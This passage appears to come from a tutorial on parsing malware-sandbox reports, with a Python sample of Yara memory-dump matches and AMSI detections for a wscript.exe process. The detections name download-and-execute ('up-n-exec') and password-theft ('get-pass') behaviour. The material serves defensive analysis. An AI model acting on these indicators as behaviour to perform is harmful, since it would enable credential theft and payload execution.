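# Constructed sample: a handful of evidence lines copied from the section above.
SAMPLE = r"""
Source: Yara match File source: 0000000E.00000002.845740262.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.546167949.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.848811043.0000026E2ADF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.374542669.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 748, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6100, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string up-n-exec
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string get-pass
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string up-n-exec
""".strip().splitlines()

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

On the sample, process index 0x0E is hit twice in the same region (a run-time dump and the final dump of one buffer), while index 6 is hit in two different regions; the PCAP line is ignored because it is neither a dump nor a process-space record. Feeding the whole section through the same function gives the process-index set and region counts for the full report.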